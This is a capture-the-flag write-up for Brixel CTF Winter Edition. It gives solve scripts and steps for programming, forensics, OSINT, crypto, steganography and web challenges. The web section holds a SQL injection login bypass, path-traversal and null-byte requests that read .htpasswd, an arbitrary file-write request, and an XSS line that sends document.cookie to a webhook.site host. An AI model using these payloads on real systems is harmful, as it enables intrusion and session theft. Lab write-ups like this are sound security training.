---
tags: 'CTF'
---
Brixel CTF Winter Edition
===
:::info
<i class="fa fa-user-circle-o" aria-hidden="true"></i> @codeskill
<i class="fa fa-clock-o" aria-hidden="true"></i> 2020-12-26
<i class="fa fa-external-link" aria-hidden="true"></i> https://ctf.brixel.space/
:::
[TOC]
## Programming
### Are you fast enough?
![](https://i.imgur.com/RFMewDl.png)
`solve.sh`
```bash=
#!/bin/bash
curl -s http://timesink.be/speedy/ -X POST -d inputfield=$(curl -s http://timesink.be/speedy/index.php -c cookie.txt | grep -oP '(?<=div id="rndstring" align="center">).*(?=<\/div><br>)' | tr -d "\n" | tr -d -) -b cookie.txt
```
`./solve.sh`
```htmlembedded=
<html><body><div align="center"><h1>Are you fast enough?</h1></div><hr><div align="center">You took: 0 second(s) to complete the task.</div><br><div align="center">Congratulations, you completed the task in under 1 seconds!</div><div algin="center">The flag is: <b>brixelCTF{sp33d_d3m0n}</b></div></body></html>%
```
`solve.py`
```python3=
import requests
import re
t = "http://timesink.be/speedy"
s = requests.Session()
print(f"Requesting {t}...")
req = s.get(t)
# raw string so that \w reaches the regex engine unchanged
p = re.compile(r'<div id="rndstring" align="center">(\w*)</div>')
random_str = p.search(req.text).group(1)
print(f"Got randomstring: {random_str}")
print("Posting...")
r2 = s.post("http://timesink.be/speedy/index.php", data={"inputfield": random_str})
print(r2.text)
```
:::success
brixelCTF{sp33d_d3m0n}
:::
### Keep walking
`solve.py`
```python=
x = 1
y = 1
previous_answer = 1
answer = x * y + previous_answer + 3
# apply the formula for every step up to x = 525
while x < 525:
    x = x + 1
    y = y + 1
    previous_answer = answer
    answer = x * y + previous_answer + 3
print("answer=" + str(answer))
print("previous_answer=" + str(previous_answer))
print("x=" + str(x))
print("y=" + str(y))
print("formula: " + str(answer) + "=" + str(x) + "*" + str(y) + "+" + str(previous_answer) + "+" + "3")
```
```python3=
x = 1
y = 1
prev_answer = 1
answer = None
while x <= 525:
    answer = x*y + prev_answer + 3
    print(f"{x = } ==> {answer = }")
    x += 1
    y += 1
    prev_answer = answer
```
:::success
brixelCTF{48373851}
:::
### A song...
Copy the song and paste into https://codewithrockstar.com/online
![](https://i.imgur.com/3F3hXuY.png)
:::success
brixelCTF{5667236346614}
:::
### An arduino project
### Quizbot
```python3
import requests
import json
from bs4 import BeautifulSoup as bs4

################################################################################
#
# Stage 1:
#
# Request a session for the first "round". In this round we submit a lot of
# wrong answers and store the solution the server gives back. The plan is to
# use these solutions in a second round to solve the questions.
#
########################################

# question_mapping maps each question to its answer
# load the data stored by an earlier run, if there is any
question_mapping = {}
try:
    with open("solutions.json") as data:
        question_mapping = json.load(data)
except FileNotFoundError:
    pass

s1 = requests.Session()

i = 0
while len(question_mapping) < 1000:
    print(f"\r{i}\t{len(question_mapping)}", end="", flush=True)
    r = s1.get("http://timesink.be/quizbot/index.php")
    soup = bs4(r.text, "html.parser")
    question = soup.h4.text

    # post a wrong answer; the response contains the right one
    payload = {"insert_answer": "asdfghjkl", "submit": "answer"}
    r = s1.post("http://timesink.be/quizbot/index.php", data=payload)
    soup = bs4(r.text, "html.parser")
    answer = soup.find(id="answer").text
    question_mapping[question] = answer
    i += 1

# save the dict to json
with open("solutions.json", "w") as outfile:
    json.dump(question_mapping, outfile)
print("")

################################################################################
#
# Stage 2:
#
# Use the solutions collected in stage 1 (in a fresh session)
#
########################################
s2 = requests.Session()
for i in range(0, 1100):
    try:
        r = s2.get("http://timesink.be/quizbot/index.php", timeout=10)
        soup = bs4(r.text, "html.parser")
        question = soup.h4.text
        # fall back to a dummy answer for questions not seen in stage 1
        answer = question_mapping.get(question, "abc")
        print(question)
        print(answer)

        # post with body:
        payload = {"insert_answer": answer, "submit": "answer"}
        r = s2.post("http://timesink.be/quizbot/index.php", data=payload, timeout=10)
        print(r.text)
    except Exception:
        print("SOME ERROR OCCURRED")
```
:::success
brixelCTF{kn0wl3dg3}
:::
## Forensics
### Message from Space
https://ourcodeworld.com/articles/read/956/how-to-convert-decode-a-slow-scan-television-transmissions-sstv-audio-file-to-images-using-qsstv-in-ubuntu-18-04
Download the app > `Robot32 - SSTV Image Decoder`
Listen to the wav file and wait for the image to render
SSTV in Scottie1-Mode
![](https://i.imgur.com/vpNg8h4.png)
:::success
brixelCTF{SP4C3L4B}
:::
### Lottery Ticket
- Picture of lottery ticket
- If you zoom in you see compression artifacts around most numbers
- Edited numbers got none, sum them together --> Flag is "203"
:::success
brixelCTF{203}
:::
### Lost evidence
- Use `foremost` to extract the .wav
- Decode the DTMF in the wave file
- You get the transaction reason: `cocaine`
:::success
brixelCTF{cocaine}
:::
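
The DTMF step above, as an added example that is not part of the original write-up: a Goertzel-based decoder that reports which keypad keys sound in a stream of samples. The signal is synthesized in the script as a constructed stand-in for the carved .wav; the 20 ms block size and the `min_share` threshold are assumptions.

```python
import math

# Standard DTMF keypad: every key is one low-group tone plus one high-group tone.
LOW = (697, 770, 852, 941)
HIGH = (1209, 1336, 1477, 1633)
KEYS = ("123A", "456B", "789C", "*0#D")

def goertzel_power(samples, rate, freq):
    """Squared magnitude of the signal at `freq` (Goertzel algorithm)."""
    k = 2.0 * math.cos(2.0 * math.pi * freq / rate)
    s1 = s2 = 0.0
    for x in samples:
        s1, s2 = x + k * s1 - s2, s1
    return s1 * s1 + s2 * s2 - k * s1 * s2

def detect_key(block, rate, min_share=0.1):
    """Key sounding in one block, or None for silence or non-DTMF audio.
    Both tones must carry a real share of the block's energy (assumed threshold)."""
    energy = sum(x * x for x in block)
    if energy == 0.0:
        return None
    power = {f: goertzel_power(block, rate, f) for f in LOW + HIGH}
    low, high = max(LOW, key=power.get), max(HIGH, key=power.get)
    floor = min_share * len(block) * energy
    if power[low] < floor or power[high] < floor:
        return None
    return KEYS[LOW.index(low)][HIGH.index(high)]

def decode_dtmf(samples, rate, block_ms=20):
    """Decode mono float samples into the sequence of pressed keys."""
    n = rate * block_ms // 1000
    keys, prev = [], None
    for i in range(0, len(samples) - n + 1, n):
        key = detect_key(samples[i:i + n], rate)
        if key is not None and key != prev:   # report a key once per press
            keys.append(key)
        prev = key
    return "".join(keys)

def synth(keys, rate=8000, tone_ms=80, gap_ms=60):
    """Constructed test signal: one tone pair per key, then silence."""
    samples = []
    for key in keys:
        row = next(r for r, line in enumerate(KEYS) if key in line)
        fl, fh = LOW[row], HIGH[KEYS[row].index(key)]
        samples += [0.5 * math.sin(2 * math.pi * fl * t / rate)
                    + 0.5 * math.sin(2 * math.pi * fh * t / rate)
                    for t in range(rate * tone_ms // 1000)]
        samples += [0.0] * (rate * gap_ms // 1000)
    return samples
```

For a real recording, read the frames with the standard `wave` module, scale them to floats and pass them to `decode_dtmf` together with the file's sample rate.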
## OSINT
### Visit Limburg #1
https://www.google.com/maps/d/viewer?mid=13WdFG3f5N8YGKQ6tTO4XTcxZlwFZ2Dgq&ll=50.693156402179554%2C5.707086178620777&z=16
### Visit Limburg #2
3.05.13
`7.05.09`
https://www.google.com/maps/@50.9409526,5.4027559,3a,32.9y,53.72h,88.17t/data=!3m7!1e1!3m5!1spIOYm_3knO82AWp-QKjpBg!2e0!5s20130601T000000!7i13312!8i6656
### Visit Limburg #3
https://www.openstreetmap.org/search?query=airport%20in%20limburg#map=11/51.0996/5.4437
### Physical
https://www.bipt.be/operators/publication/database-with-reserved-and-allocated-numbers
https://osintframework.com/
### A quick search
Google Lens or Yandex Images
![](https://i.imgur.com/owPHhV2.jpg =200x300)
Eben-Ezer Tower
:::success
brixelCTF{Eben-Ezer}
:::
### Manhunt (1-n)
Facts:
- https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/
- https://twitter.com/johnnydorfmeis1
- http://www.howitshould.be
- https://github.com/JohnnyDorfmeister
1. `Johnny Dorfmeister`: Taken from the EXIF-data of the image
2. `pishapasha`: Googling the name takes you to this Linkedin-profile: https://www.linkedin.com/in/johnny-dorfmeister-1135a6179/
3. fav food: `macaroni`
Taken from https://www.instagram.com/JohnnyDorfmeister/
4. bday: tbd
5. `w@yb@ck!`: Using the wayback-machine: https://web.archive.org/web/20190115103029/http://www.howitshould.be/test-page/ (Taken from his twitter-account @johnnydorfmeis1)
6. `poetry`: Translate the Russian text on howitshould.be with Google.
7. Fill in the contact form and his address will be presented
8. `just_married`: With Google Street View on the address from no. 7, move back in time
9. `g1ttern00b`: Username "johnny", Password "letmein" taken from old commit on github
## Reverse Engineering / cracking
### Cookieee!
Cheatengine
search for the cookie amount
increase it
done
### noPEEKing
strings on the exe
### registerme.exe
strings on exe
create a file called register.key
start the exe
### android app
## Old tech
### punchcard
Upload the punchcard here:
https://www.masswerk.at/cardreader/
:::success
brixelCTF{M41NFR4M3}
:::
### Goodbye old friend
Download the SWF
Extract the content
then again
search through the files till you find the flag
### The tape
## Crypto
### Sea code
message.wav
![](https://i.imgur.com/9nGiYNw.png)
```
- .... . ..-. .-.. .- --. ..-. --- .-. - .... .. ... -.-. .... .- .-.. .-.. . -. --. . .. ... ... . .- --. ..- .-.. .-..
```
![](https://i.imgur.com/4LN8Pj3.png)
theflagforthischallengeis seagull
:::success
brixelCTF{seagull}
:::
### Merde
vigenere with "confidentiel" as the key:
```
The flag is
```
`brixelCTF{baguette}`
### Merda
rot 21
`brixelCTF{pizzanapoli}`
### s̸͖̾̀͊͠h̸̜̒ï̷̧̲͙̭̤͛͒̋t̷̢̲͚͖̑͜
base64 decode + binary decode
`brixelCTF{robocop}`
### Scheiße
qbhbh zrmua gfbld ocqbv
![](https://i.imgur.com/KqqSGVd.png)
derflagistsauerkraut
the flag is sauerkraut
:::success
brixelCTF{sauerkraut}
:::
### flawed
Username:admin
Passwordhash:d269ce15f9c44bc3992a5f4e5f273e06
![](https://i.imgur.com/7tUIaj8.png)
:::success
brixelCTF{notsecure}
:::
### Don't be salty
```python3=
import hashlib
import itertools
import string

# Try every 5-letter lowercase password (a-z) with the suffix appended and
# print each candidate next to its MD5 hash, so the output can be searched
# for the target hash.
for letters in itertools.product(string.ascii_lowercase, repeat=5):
    pw = "".join(letters) + "04532@#!!"
    print(pw, hashlib.md5(pw.encode('utf-8')).hexdigest())
```
:::success
brixelCTF{brute}
:::
## Steganography
### Doc-ception
```
unzip loremipsum.docx
unzip loremipsum
cat flag.txt
flag = openxml
```
:::success
brixelCTF{openxml}
:::
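
The two manual `unzip` steps above generalize to a recursive search. The following added example (not part of the original write-up) looks for a named member in a ZIP and in any ZIP nested inside it, whatever its extension. The sample archive is built in memory as a constructed stand-in for `loremipsum.docx`; its layout, `MAX_MEMBER` and `max_depth` are assumptions.

```python
import io
import zipfile

MAX_MEMBER = 10 * 1024 * 1024   # assumed cap per member, guards against zip bombs

def find_in_nested_zip(data, wanted, path="", max_depth=5):
    """Yield (path, content) for each member named `wanted`, descending into
    members that are ZIP archives themselves, whatever their extension."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or info.file_size > MAX_MEMBER:
                continue
            member = f"{path}/{info.filename}" if path else info.filename
            blob = zf.read(info)
            if info.filename.rsplit("/", 1)[-1] == wanted:
                yield member, blob
            elif max_depth > 0 and zipfile.is_zipfile(io.BytesIO(blob)):
                yield from find_in_nested_zip(blob, wanted, member, max_depth - 1)

def build_sample_docx():
    """Constructed stand-in for loremipsum.docx: a ZIP holding another ZIP."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr("flag.txt", "constructed sample flag\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("loremipsum", inner.getvalue())   # inner archive without extension
    return outer.getvalue()

if __name__ == "__main__":
    for member, blob in find_in_nested_zip(build_sample_docx(), "flag.txt"):
        print(member, blob.decode().strip())
```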
### Limewire audio
`Audacity > Spectrogram`
![](https://i.imgur.com/vlmas35.png)
:::success
brixelCTF{hellokitty}
:::
### Scan Me
- qr-code image
- crop smaller qr-code image from first
- go to website, scan barcode
- enter result, scan next barcode, repeat
- receive flag: brixelCTF{m4st3r_0f_sc4n5}
:::success
brixelCTF{m4st3r_0f_sc4n5}
:::
### Rufus the vampire cat
`steghide info rufus.jpg`
```
"rufus.jpg":
format: jpeg
capacity: 8.5 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "steganopayload639.txt":
size: 85.0 Byte
encrypted: rijndael-128, cbc
compressed: yes
```
`steghide extract -sf rufus.jpg`
```
Enter passphrase:
wrote extracted data to "steganopayload639.txt".
```
`less steganopayload639.txt`
```
You thought this was a cute cat picture? NOPE! Chuck Testa! (the flag is:
chucktesta)
```
:::success
brixelCTF{chucktesta}
:::
## Internet
### Easy
```
curl -s https://ctf.brixel.space/ | grep -i flag
<!-- hidden flag: 'brixelCTF{notsosecret}' -->
```
:::success
brixelCTF{notsosecret}
:::
### Discord
5: Reading the rules gets you this flag: brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}
:::success
brixelCTF{th4nk5_f0r_r34d1ng_th3_rulz}
:::
### Hidden Code
https://www.brixel.be/
View page source code and find `konami`
```javascript!
/* <![CDATA[ */
var wpee_config = {"type":"konami","custom_code":"9","action":"move_image_across_middle","custom_js":"alert('test');","image":"http:\/\/brixel.be\/wp-content\/uploads\/2016\/10\/15908854_90x90.png.gif"};
/* ]]> */
```
http://brixel.be/wp-content/uploads/2016/10/15908854_90x90.png.gif
![](https://i.imgur.com/hsQTDHS.png =200x200)
:::success
brixelCTF{Mario}
:::
### Hiding in the background
```htmlembedded=
<style>
body{color: #FFFFFF; background-color: #000000; background-image: url("/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg"); background-repeat: repeat; background-size: 50%;}
</style>
```
```
wget https://ctf.brixel.space/files/7150e745dc874ec7ae7a8d8fc8fa0aba/ctfbg.svg
strings ctfbg.svg | grep -i ctf
sodipodi:docname="ctfbg.svg">
style="fill:#000000;fill-opacity:1;stroke-width:0.264583">brixelCTF{happy_holidays}</tspan></text>
```
:::success
brixelCTF{happy_holidays}
:::
### Readme
https://ctf.brixel.space/guide
:::success
brixelCTF{freepoints}
:::
### robotopia
http://timesink.be/robotopia/robots.txt
:::success
brixelCTF{sadr0b0tz}
:::
### login1
plain text in javascript source
:::success
brixelCTF{w0rst_j4v4scr1pt_3v3r!}
:::
### login2
![](https://i.imgur.com/k2U4rqm.png)
```javascript=
function verify() {
    password = "brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}"
    split = 6;
    if (password.substring(0, split) == 'brixel')
    {
        if (password.substring(split*6, split*7) == '180790')
        {
            if (password.substring(split, split*2) == 'CTF{st')
            {
                if (password.substring(split*4, split*5) == '5cr1pt')
                {
                    if (password.substring(split*3, split*4) == 'd_j4v4')
                    {
                        if (password.substring(split*5, split*6) == '_h3r3.')
                        {
                            if (password.substring(split*2, split*3) == '1ll_b4')
                            {
                                if (password.substring(split*7, split*8) == '54270}')
                                {
                                    console.log("Password Verified")
                                }
                            }
                        }
                    }
                }
            }
        }
    }
    else
    {
        console.log("Incorrect password");
    }
}
verify()
```
:::success
brixelCTF{st1ll_b4d_j4v45cr1pt_h3r3.18079054270}
:::
### login3
http://timesink.be/login3/password.txt
:::success
brixelCTF{n0t_3v3n_cl05e_t0_s3cur3!}
:::
### login4
http://timesink.be/login4/password.txt + base64 decode
:::success
brixelCTF{even_base64_wont_make_you_secure}
:::
### login5
```javascript!
function verify() {
    var _0x41653e = _0x58ab;
    password = document[_0x41653e(0x194)](_0x41653e(0x192))['value'],
    alphabet = _0x41653e(0x193),
    newpassword = alphabet['substr'](0x1, 0x1), // b
    newpassword = newpassword + alphabet['substr'](0x11, 0x1), // r
    newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
    newpassword = newpassword + alphabet['substr'](0x17, 0x1), // x
    newpassword = newpassword + alphabet['substr'](0x4, 0x1), // e
    newpassword = newpassword + alphabet['substr'](0xb, 0x1), // l
    newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
    newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
    newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
    newpassword = newpassword + alphabet['substr'](39 - 0x2, 0x1), // {
    newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0
    newpassword = newpassword + alphabet['substr'](0x1, 0x1), // b
    newpassword = newpassword + alphabet['substr'](0x5, 0x1), // f
    newpassword = newpassword + alphabet['substr'](0x14, 0x1), // u
    newpassword = newpassword + alphabet['substr'](0x12, 0x1), // s
    newpassword = newpassword + alphabet['substr'](0x2, 0x1), // c
    newpassword = newpassword + alphabet['substr'](0x0, 0x1), // a
    newpassword = newpassword + alphabet['substr'](0x13, 0x1), // t
    newpassword = newpassword + alphabet['substr'](0x8, 0x1), // i
    newpassword = newpassword + alphabet['substr'](39 - 0x4, 0x1), // 0
    newpassword = newpassword + alphabet['substr'](0xd, 0x1), // n
    newpassword = newpassword + alphabet['substr'](39 - 0x1, 0x1), // }
    password == newpassword ? alert(_0x41653e(0x196)) : alert(_0x41653e(0x195));
}
```
:::success
brixelctf{0bfuscati0n}
:::
### Browsercheck
Google search to identify user-agent used by "ask jeeves crawler"
`curl 'http://timesink.be/browsercheck/' -H 'User-Agent: Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)'`
```
<html><body><div align="center"><h1>congratulations</h1>the flag is 'brixelCTF{askwho?}'</div></body></html>
```
:::success
brixelCTF{askwho?}
:::
### SnackShack awards
```!
curl 'http://timesink.be/snackshackaward/stemmen.php' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://timesink.be' -H 'Connection: keep-alive' -H 'Referer: http://timesink.be/snackshackaward/index.html' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data-raw 'score_bammens=0&score_omejan=0&score_fontainas=0&score_tpleintje=5000&score_frietuurtje=0'
```
:::success
brixelCTF{bakpau}
:::
### Flat earth
Brute force username and login here: http://timesink.be/flatearth/admin.php
```
' OR ''=' --
```
:::success
brixelCTF{aroundtheglobe}
:::
### Dadjokes
Upload reverse shell here:
http://timesink.be/dadjokes/jokes/submit.php
File Read:
http://timesink.be/dadjokes/jokes/read.php?file=mugged.txt
`http://timesink.be/dadjokes/jokes/submit.php?filename=%3C?php%20echo%20\`
```!
Notice: Undefined index: title in /home/kevinay5/domains/timesink.be/public_html/dadjokes/jokes/submit.php on line 47
please provide a title
```
The solution is to fix the page. This gives you the solution:
```
curl 'http://timesink.be/dadjokes/jokes/submit.php?filename=../index.html&title=index&submit=true&content=%0D%0A%3Chtml%3E%3Ctitle%3EDadJokes%2C+your+source+of+lame+dad+jokes%3C%2Ftitle%3E%3Cbody%3E%3Cdiv+align%3D%22center%22%3E%3Ch1%3EDadJokes%3C%2Fh1%3E%3Chr%3E%3Cimg+src%3D%22images%2Fbanner.png%22+alt%3D%22dadjokes%22%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fread.php%22%3ERead+dad+jokes%3C%2Fa%3E%3Cbr%3E%3Cbr%3E%3Ca+href%3D%22jokes%2Fsubmit.php%22%3Esubmit+your+own+jokes%3C%2Fa%3E%3C%2Fdiv%3E%3C%2Fhtml%3E'
```
`document.write('<img src="https://webhook.site/#!/0129c597-c633-4ef5-b4bb-c2ee2a805adc?cookie=' + document.cookie + '" />')`
### Pathfinders \#1
`index.php` loads whatever file the `page` parameter names, without any restriction, so simply request:
`http://timesink.be/pathfinder/index.php?page=admin/.htpasswd`
:::success
brixelCTF{unsafe_include}
:::
### Pathfinders \#2
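`index.php` again loads whatever file the `page` parameter names. This time the path is given a `%00.php` suffix: on outdated PHP versions the null byte terminates the file name, so `admin/.htpasswd` is still the file that gets read: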
`http://timesink.be/pathfinder2/index.php?page=admin/.htpasswd%00.php`
:::success
brixelCTF{outdated_php}
:::
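
The Pathfinders `page` parameter and the Dadjokes `filename` parameter fail in the same way: a user-supplied path is joined to a directory and used as is. The following is an added mitigation example, not the challenge's code; it is written in Python like the solve scripts above although the challenges run PHP. The names `resolve_page` and `verdict`, the suffix allow-list and the base directory are hypothetical.

```python
import os
from urllib.parse import unquote

ALLOWED_SUFFIXES = (".php", ".html")   # assumed set of servable page types

def resolve_page(base_dir, page):
    """Return the file under base_dir that `page` names, or raise ValueError.
    `page` is the already URL-decoded parameter value."""
    if "\x00" in page:
        raise ValueError("NUL byte in path")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, page))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the page directory")
    parts = os.path.relpath(target, base).split(os.sep)
    if any(part.startswith(".") for part in parts):
        raise ValueError("hidden file or directory")
    if not target.endswith(ALLOWED_SUFFIXES):
        raise ValueError("file type not allowed")
    return target

def verdict(base_dir, raw_value):
    """'ok' or the rejection reason for a raw (still URL-encoded) value."""
    try:
        resolve_page(base_dir, unquote(raw_value))
        return "ok"
    except ValueError as exc:
        return str(exc)

if __name__ == "__main__":
    base = "/srv/site/pages"   # constructed document root
    for raw in ("home.php",                   # constructed legitimate page
                "admin/.htpasswd",            # Pathfinders #1
                "admin/.htpasswd%00.php",     # Pathfinders #2
                "../index.html"):             # Dadjokes filename
        print(f"{raw!r}: {verdict(base, raw)}")
```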